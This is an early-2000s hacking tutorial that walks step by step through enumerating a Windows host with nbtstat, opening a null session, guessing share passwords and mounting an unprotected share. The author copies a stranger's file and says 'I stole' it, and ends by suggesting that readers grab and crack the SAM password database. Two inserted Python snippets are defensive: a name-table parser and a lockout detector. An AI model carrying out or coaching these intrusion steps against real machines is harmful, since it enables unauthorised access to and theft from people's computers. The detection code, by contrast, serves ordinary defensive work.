Madirish Tutorial 09

Ok, hopefully this will show you how important it is to a) choose a good logon password, and b) password protect any shares you are using. Let's say that through a network scan I find that the computer at 216.25.200.132 is a Windows machine. I want to check and see if that machine is sharing anything, and if I can get at the shares. Note: the IP addresses and names have been CHANGED to protect the vulnerable. The paragraphs between the command blocks are my comments; the rest is actual output from my session:

C:\>nbtstat -A 215.25.200.152

Local Area Connection 2:
Node IpAddress: [0.0.0.0] Scope Id: []

    Host not found.

Local Area Connection:
Node IpAddress: [215.25.200.135] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    NCARTER        <00>  UNIQUE      Registered
    SVNET          <00>  GROUP       Registered
    NCARTER        <20>  UNIQUE      Registered
    SVNET          <1E>  GROUP       Registered
    NCARTER        <03>  UNIQUE      Registered
    NCARTER        <1F>  UNIQUE      Registered

    MAC Address = 00-00-E8-9A-9E-12


\Device\NetBT_Tcpip_{7CD42A51-8B2F-4A5F-A42E-1C76F336D3DE}:
Node IpAddress: [215.25.200.140] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    NCARTER        <00>  UNIQUE      Registered
    SVNET          <00>  GROUP       Registered
    NCARTER        <20>  UNIQUE      Registered
    SVNET          <1E>  GROUP       Registered
    NCARTER        <03>  UNIQUE      Registered
    NCARTER        <1F>  UNIQUE      Registered

    MAC Address = 00-00-E8-9A-9E-12

Using this command I have found that the username on this computer is NCARTER, and the workgroup is SVNET. Now the fun begins:
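The name table above is what a defender can read off their own hosts too: each <xx> suffix is registered by a particular service, and the <20> entry is the one that says the File Server Service is up, i.e. this host will answer share requests at all. As an added example (not from the tutorial), the following parser decodes a constructed copy of that table; the <03> Messenger Service name is registered for the computer and for any logged-on user, so a user name shows up there only when it differs from the computer name.

```python
"""Decode an nbtstat -A name table into what each entry advertises.
Added example, not from the tutorial; SAMPLE is constructed to match the
table above and SUFFIXES holds the documented NetBIOS name suffixes."""
import re

SUFFIXES = {  # (suffix, type) -> service that registered the name
    ("00", "UNIQUE"): "Workstation Service (computer name)",
    ("03", "UNIQUE"): "Messenger Service (computer or logged-on user name)",
    ("20", "UNIQUE"): "File Server Service (file/printer sharing enabled)",
    ("1F", "UNIQUE"): "NetDDE Service",
    ("00", "GROUP"): "Workgroup/domain name",
    ("1E", "GROUP"): "Browser Service elections",
}
ROW = re.compile(r"^\s*(\S.*?)\s+<([0-9A-F]{2})>\s+(UNIQUE|GROUP)\s+(\w+)")

def parse_name_table(text):
    """Return (name, suffix, type, status) tuples for each table row."""
    return [m.groups() for m in map(ROW.match, text.splitlines()) if m]

def summarize(rows):
    """Reduce the table to what a defender triages: host, workgroup, whether
    the File Server Service (<20>) is up, and any user names leaked via <03>."""
    info = {"computer": None, "workgroup": None, "file_sharing": False,
            "users": [], "services": []}
    for name, suffix, kind, status in rows:
        if status != "Registered":
            continue
        info["services"].append((name, suffix, SUFFIXES.get((suffix, kind), "unknown")))
        if (suffix, kind) == ("00", "UNIQUE"):
            info["computer"] = name
        elif (suffix, kind) == ("00", "GROUP"):
            info["workgroup"] = name
        elif (suffix, kind) == ("20", "UNIQUE"):
            info["file_sharing"] = True
    # A <03> name that is not the computer name is a logged-on user's name.
    info["users"] = [n for n, s, k, _ in rows
                     if (s, k) == ("03", "UNIQUE") and n != info["computer"]]
    return info

SAMPLE = """\
    NCARTER        <00>  UNIQUE      Registered
    SVNET          <00>  GROUP       Registered
    NCARTER        <20>  UNIQUE      Registered
    SVNET          <1E>  GROUP       Registered
    NCARTER        <03>  UNIQUE      Registered
    NCARTER        <1F>  UNIQUE      Registered
"""

if __name__ == "__main__":
    print(summarize(parse_name_table(SAMPLE)))
```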

C:\>net use \\215.25.200.152\ipc$ /user:ncarter
Local name
Remote name       \\215.25.200.152\ipc$
Resource type     IPC
Status            OK
# Opens           0
# Connections     1
The command completed successfully.

Ok, this is a bit simulated: usually you'll have to enter a password, but I got lucky here and there was no password in effect. If there had been a password you could issue 'net use \\215.25.200.152\ipc$ /user:ncarter PASSWORD', where PASSWORD is your guess at their password. Many systems will lock you out after 3 bad attempts, but you'd be surprised how many won't. What you're doing is trying to establish a null share connection.
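The lockout after three bad attempts mentioned above is something a server can enforce and a defender can watch for in its logs. As an added example (not from the tutorial), the following check counts failed share logons per source and account inside a sliding time window, which is the same rule an account lockout threshold applies; SAMPLE_LOG is constructed in a made-up text format, not a real Windows event log, so the parser is the part to adapt.

```python
"""Flag repeated share logon failures from one source, the way an account
lockout threshold would. Added example, not from the tutorial; SAMPLE_LOG is
constructed in a simple made-up text format, not a real Windows event log."""
from collections import defaultdict, deque
from datetime import datetime
import re

LINE = re.compile(
    r"^(\S+ \S+) LOGON_(FAILURE|SUCCESS) user=(\S+) src=(\S+) share=(\S+)$")

def parse(lines):
    """Yield (time, outcome, user, src, share) for each well-formed line."""
    for line in lines:
        m = LINE.match(line.strip())
        if m:
            ts, outcome, user, src, share = m.groups()
            yield datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), outcome, user, src, share

def guessing_sources(events, threshold=3, window_seconds=300):
    """Return {(src, user): peak failures} for (source, account) pairs that
    reach `threshold` failures inside a sliding window of `window_seconds`."""
    recent = defaultdict(deque)   # (src, user) -> failure times still in window
    hits = {}
    for ts, outcome, user, src, _share in sorted(events):
        if outcome != "FAILURE":
            continue                  # successes are simply ignored here
        q = recent[(src, user)]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()               # drop failures older than the window
        if len(q) >= threshold:
            hits[(src, user)] = max(hits.get((src, user), 0), len(q))
    return hits

SAMPLE_LOG = """\
2000-11-29 13:00:01 LOGON_FAILURE user=ncarter src=215.25.200.140 share=IPC$
2000-11-29 13:00:09 LOGON_FAILURE user=ncarter src=215.25.200.140 share=IPC$
2000-11-29 13:00:15 LOGON_FAILURE user=ncarter src=215.25.200.140 share=IPC$
2000-11-29 13:00:20 LOGON_SUCCESS user=ncarter src=215.25.200.140 share=PUBLIC
2000-11-29 13:07:40 LOGON_FAILURE user=ncarter src=215.25.200.140 share=TOSEND
2000-11-29 09:00:00 LOGON_FAILURE user=bob src=215.25.200.141 share=IPC$
2000-11-29 09:30:00 LOGON_FAILURE user=bob src=215.25.200.141 share=IPC$
2000-11-29 09:45:00 LOGON_FAILURE user=bob src=215.25.200.141 share=IPC$
""".splitlines()

if __name__ == "__main__":
    for (src, user), n in guessing_sources(parse(SAMPLE_LOG)).items():
        print(f"{src} made {n} failed attempts on {user} within 5 minutes")
```

The slow attempts against bob stay under the radar of the 5-minute window, which is why the window length matters as much as the count.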

C:\>net view \\215.25.200.152
Shared resources at \\215.25.200.152



Share name   Type         Used as  Comment

-------------------------------------------------------------------------------
HP COLOR     Print
MUSIC        Disk         
PUBLIC       Disk         
TOSEND       Disk
The command completed successfully.

Ok, now we know the names of the shares on this computer. Let's try to connect to the 'TOSEND' share:

C:\>net use u: \\215.25.200.152\tosend
The password is invalid for \\215.25.200.152\tosend.

Type the password for \\215.25.200.152\tosend:
System error 5 has occurred.

Access is denied.

No dice, it's password protected. Let's try the others:

C:\>net use y: \\215.25.200.152\public
The command completed successfully.

Bingo, we're in. Notice the y: in the 'net use' command? That's the local drive letter that we're going to use as a link to the share on NCARTER.

C:\>net view \\215.25.200.152
Shared resources at \\215.25.200.152



Share name   Type         Used as  Comment

-------------------------------------------------------------------------------
HP COLOR     Print
MUSIC        Disk        
PUBLIC       Disk         Y:
TOSEND       Disk
The command completed successfully.

C:\>dir y:
 Volume in drive Y is HP_PAVILION
 Volume Serial Number is 1C68-0F0A

 Directory of Y:
04/26/2000  12:56p      <DIR>          .
04/26/2000  12:56p      <DIR>          ..
04/26/2000  11:57a                 331 Shortcut to Sawmill5.0.lnk
04/26/2000  12:58p              29,696 hits.doc
04/26/2000  01:33p             978,918 wtapi.pdf
04/26/2000  01:44p              19,456 USER TIMEOUT.doc
05/04/2000  02:34p              23,552 Letterhead.dot
11/15/2000  06:37p              20,480 Contact list.doc
07/24/2000  01:19p              87,040 Elegant Fax.doc
09/18/2000  12:38p           7,710,412 KingofPrussia000918.pdf
06/26/2000  04:28p      <DIR>          HP Drivers
09/18/2000  05:04p              15,906 cover.jpg
06/22/2000  12:33p      <DIR>          halflife update
06/02/2000  02:05p      <DIR>          School 
09/06/2000  02:40p      <DIR>          abae
01/29/2000  05:33p      <DIR>          Content
04/27/2000  02:21p      <DIR>          photos
05/23/2000  01:22p      <DIR>          delete_button
03/01/2001  02:12p      <DIR>          Firewall Docs
06/20/2000  03:28p      <DIR>          Install
06/27/2000  10:26a      <DIR>          HomePage
07/12/2000  02:12p                 463 Team Fortress Classic Manual.lnk
09/18/2000  10:54a          16,864,741 wtetrial.exe
10/26/2000  04:39p      <DIR>          Visor programs
11/29/2000  03:39p              26,112 TCS VS letter.doc
              12 File(s)     25,777,107 bytes
              13 Dir(s)   5,406,457,856 bytes free

C:\>copy y:\hits.doc
        1 file(s) copied.

C:\>dir hits*
 Volume in drive C has no label.
 Volume Serial Number is 94B4-57C0

 Directory of C:
04/26/2000  12:58p              29,696 hits.doc
               1 File(s)         29,696 bytes
               0 Dir(s)   2,796,068,864 bytes free

The rest of what I did should be pretty obvious. I stole a copy of hits.doc and moved it to my local C: drive. Notice how easy all of this was?!? If you're really lucky you'll get an NT machine and be able to copy the SAM database file and crack it to get a list of all the users AND their passwords. Enjoy.

-------------------------------------------------------------------------------------------

The tutorial, unfortunately, describes the method to connect to Windows 98, Windows ME and Samba shares only. NT, 2000 and XP authenticate against a domain as well, so if you want to connect to an XP share you have to specify the domain in your username, for instance:

net use \\target.hostname.ext\ipc$ /USER:username@fulldomain.ext password

will allow you to connect to a null session on an XP machine. It's sort of a pain in the butt. To find your domain name you can either type

ipconfig /ALL

at the command line, or you can right click on your 'My Computer', select 'Properties' then click the 'Network Identification' tab.